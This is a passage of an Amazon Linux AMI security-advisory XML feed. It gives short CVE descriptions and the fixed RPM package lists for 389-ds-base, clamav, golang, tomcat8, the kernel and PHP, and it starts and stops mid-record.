CVE-2019-10224 389-ds-base: using dscreate in verbose mode results in information disclosure
CVE-2018-10871:
389-ds-base before versions 1.3.8.5, 1.4.0.12 is vulnerable to a Cleartext Storage of Sensitive Information. By default, when the Replica and/or retroChangeLog plugins are enabled, 389-ds-base stores passwords in plaintext format in their respective changelog files. An attacker with sufficiently high privileges, such as root or Directory Manager, can query these files in order to retrieve plaintext passwords.
1591480:
CVE-2018-10871 389-ds-base: replication and the Retro Changelog plugin store plaintext password by default
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10871" title="" id="CVE-2018-10871" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10224" title="" id="CVE-2019-10224" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14824" title="" id="CVE-2019-14824" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3883" title="" id="CVE-2019-3883" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-devel" version="1.3.9.1" release="12.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.9.1-12.65.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.9.1" release="12.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.9.1-12.65.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.9.1" release="12.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.9.1-12.65.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.9.1" release="12.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.9.1-12.65.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.9.1" release="12.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.9.1-12.65.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.9.1" release="12.65.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.9.1-12.65.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.9.1" release="12.65.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.9.1-12.65.amzn1.i686.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.9.1" release="12.65.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-snmp-1.3.9.1-12.65.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.9.1" release="12.65.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.9.1-12.65.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.9.1" release="12.65.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.9.1-12.65.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1335</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1335: medium priority package update for clamav</title><issued date="2020-01-14 18:11:00" /><updated date="2020-01-15 21:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-15961:
99999:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15961" title="" id="CVE-2019-15961" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamav-milter" version="0.101.5" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.101.5-1.42.amzn1.x86_64.rpm</filename></package><package name="clamav-devel" version="0.101.5" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.101.5-1.42.amzn1.x86_64.rpm</filename></package><package name="clamav-filesystem" version="0.101.5" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.101.5-1.42.amzn1.noarch.rpm</filename></package><package name="clamd" version="0.101.5" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.101.5-1.42.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.101.5" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.101.5-1.42.amzn1.x86_64.rpm</filename></package><package name="clamav-update" version="0.101.5" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.101.5-1.42.amzn1.x86_64.rpm</filename></package><package name="clamav-db" version="0.101.5" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.101.5-1.42.amzn1.x86_64.rpm</filename></package><package name="clamav-data" version="0.101.5" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.101.5-1.42.amzn1.noarch.rpm</filename></package><package name="clamav-debuginfo" version="0.101.5" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.101.5-1.42.amzn1.x86_64.rpm</filename></package><package name="clamav-lib" version="0.101.5" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.101.5-1.42.amzn1.x86_64.rpm</filename></package><package name="clamav-update" version="0.101.5" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.101.5-1.42.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.101.5" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.101.5-1.42.amzn1.i686.rpm</filename></package><package name="clamav-db" version="0.101.5" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.101.5-1.42.amzn1.i686.rpm</filename></package><package name="clamav-lib" version="0.101.5" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.101.5-1.42.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.101.5" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.101.5-1.42.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.101.5" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.101.5-1.42.amzn1.i686.rpm</filename></package><package name="clamav" version="0.101.5" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.101.5-1.42.amzn1.i686.rpm</filename></package><package name="clamd" version="0.101.5" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.101.5-1.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1336</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1336: medium priority package update for golang</title><issued date="2020-01-14 18:15:00" /><updated date="2020-01-15 21:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-16276:
It was discovered that net/http (through net/textproto) in golang does not correctly interpret HTTP requests where an HTTP header contains spaces before the colon. This could be abused by an attacker to smuggle HTTP requests when a proxy or a firewall is placed behind a server implemented in Go or to filter bypasses depending on the specific network configuration.
Go before 1.12.10 and 1.13.x before 1.13.1 allow HTTP Request Smuggling.
99999:
CVE-2019-16276 golang: HTTP/1.1 headers with a space before the colon leads to filter bypass or request smuggling
1755969: CVE-2019-16276 golang: HTTP/1.1 headers with a space before the colon leads to filter bypass or request smuggling
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16276" title="" id="CVE-2019-16276" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang" version="1.13.4" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.13.4-1.57.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.13.4" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.13.4-1.57.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.13.4" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.13.4-1.57.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.13.4" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.13.4-1.57.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.13.4" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.13.4-1.57.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.13.4" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.13.4-1.57.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.13.4" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.13.4-1.57.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.13.4" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.13.4-1.57.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.13.4" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.13.4-1.57.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1337</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1337: medium priority package update for tomcat8</title><issued date="2020-01-14 18:18:00" /><updated date="2020-01-15 21:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-17563:
When using FORM authentication with Apache Tomcat 9.0.0.M1 to 9.0.29, 8.5.0 to 8.5.49 and 7.0.0 to 7.0.98 there was a narrow window where an attacker could perform a session fixation attack. The window was considered too narrow for an exploit to be practical but, erring on the side of caution, this issue has been treated as a security vulnerability.
1785711: CVE-2019-17563 tomcat: session fixation
CVE-2019-12418:
When Apache Tomcat 9.0.0.M1 to 9.0.28, 8.5.0 to 8.5.47, 7.0.0 and 7.0.97 is configured with the JMX Remote Lifecycle Listener, a local attacker without access to the Tomcat process or configuration files is able to manipulate the RMI registry to perform a man-in-the-middle attack to capture user names and passwords used to access the JMX interface. The attacker can then use these credentials to access the JMX interface and gain complete control over the Tomcat instance.
1785699: CVE-2019-12418 tomcat: local privilege escalation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12418" title="" id="CVE-2019-12418" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17563" title="" id="CVE-2019-17563" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-docs-webapp" version="8.5.50" release="1.82.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.50-1.82.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.50" release="1.82.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.50-1.82.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.50" release="1.82.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.50-1.82.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.50" release="1.82.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.50-1.82.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.50" release="1.82.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.50-1.82.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.50" release="1.82.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.50-1.82.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.50" release="1.82.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.50-1.82.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.50" release="1.82.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.50-1.82.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.50" release="1.82.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.50-1.82.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.50" release="1.82.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.50-1.82.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1338</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1338: important priority package update for kernel</title><issued date="2020-02-04 22:39:00" /><updated date="2024-05-09 17:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-19965:
In the Linux kernel through 5.4.6, there is a NULL pointer dereference in drivers/scsi/libsas/sas_discover.c because of mishandling of port disconnection during discovery, related to a PHY down race condition, aka CID-f70267f379b5.
CVE-2019-19332:
An out-of-bounds memory write issue was found in the way the Linux kernel's KVM hypervisor handled the 'KVM_GET_EMULATED_CPUID' ioctl(2) request to get CPUID features emulated by the KVM hypervisor. A user or process able to access the '/dev/kvm' device could use this flaw to crash the system, resulting in a denial of service.
CVE-2019-19062:
A flaw was found in the Linux kernel. The crypto_report function mishandles resource cleanup on error. A local attacker able to induce the error conditions could use this flaw to crash the system. The highest threat from this vulnerability is to system availability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19062" title="" id="CVE-2019-19062" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19332" title="" id="CVE-2019-19332" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19965" title="" id="CVE-2019-19965" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.165" release="102.185.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.165-102.185.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.165" release="102.185.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.165-102.185.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.165" release="102.185.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.165-102.185.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.165" release="102.185.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.165-102.185.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.165" release="102.185.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.165-102.185.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.165" release="102.185.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.165-102.185.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.165" release="102.185.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.165-102.185.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.165" release="102.185.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.165-102.185.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.165" release="102.185.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.165-102.185.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.165" release="102.185.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.165-102.185.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.165" release="102.185.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.165-102.185.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.165" release="102.185.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.165-102.185.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.165" release="102.185.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.165-102.185.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.165" release="102.185.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.165-102.185.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.165" release="102.185.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.165-102.185.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.165" release="102.185.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.165-102.185.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.165" release="102.185.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.165-102.185.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.165" release="102.185.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.165-102.185.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.165" release="102.185.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.165-102.185.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.165" release="102.185.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.165-102.185.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1339</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1339: medium priority package update for php72 php73</title><issued date="2020-02-04 22:42:00" /><updated date="2020-02-07 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11050:
When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash.
1788258: CVE-2019-11050 php: out-of-bounds read when parsing EXIF information
CVE-2019-11049:
In PHP versions 7.3.x below 7.3.13 and 7.4.0 on Windows, when supplying custom headers to mail() function, due to mistake introduced in commit 78f4b4a2dcf92ddbccea1bb95f8390a18ac3342e, if the header is supplied in lowercase, this can result in double-freeing certain memory locations.
1788586: CVE-2019-11049 php: double free when supplying custom headers to mail function
CVE-2019-11047:
When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash.
1786570: CVE-2019-11047 php: information disclosure in exif_read_data()
CVE-2019-11046:
In PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0, PHP bcmath extension functions on some systems, including Windows, can be tricked into reading beyond the allocated space by supplying it with string containing characters that are identified as numeric by the OS but aren't ASCII numbers. This can read to disclosure of the content of some memory locations.
1786567: CVE-2019-11046 php: OOB read in bc_shift_addsub
CVE-2019-11045:
In PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0, PHP DirectoryIterator class accepts filenames with embedded \0 byte and treats them as terminating at that byte. This could lead to security vulnerabilities, e.g. in applications checking paths that the code is allowed to access.
1786572: CVE-2019-11045 php: PHP DirectoryIterator class accepts filenames with embedded \0 byte and treats them as terminating at that byte
CVE-2019-11044:
A flaw was discovered in the link function in PHP. When compiled on Windows, it does not correctly handle paths containing NULL bytes. An attacker could abuse this flaw to bypass application checks on file paths.
99999:
CVE-2019-11044 php: link function accepts filenames with embedded null byte and treats them as terminating at that byte on Windows
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11044" title="" id="CVE-2019-11044" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11045" title="" id="CVE-2019-11045" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11046" title="" id="CVE-2019-11046" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11047" title="" id="CVE-2019-11047" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11049" title="" id="CVE-2019-11049" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11050" title="" id="CVE-2019-11050" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72-tidy" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.26" release="1.19.amzn1" epoch="0" 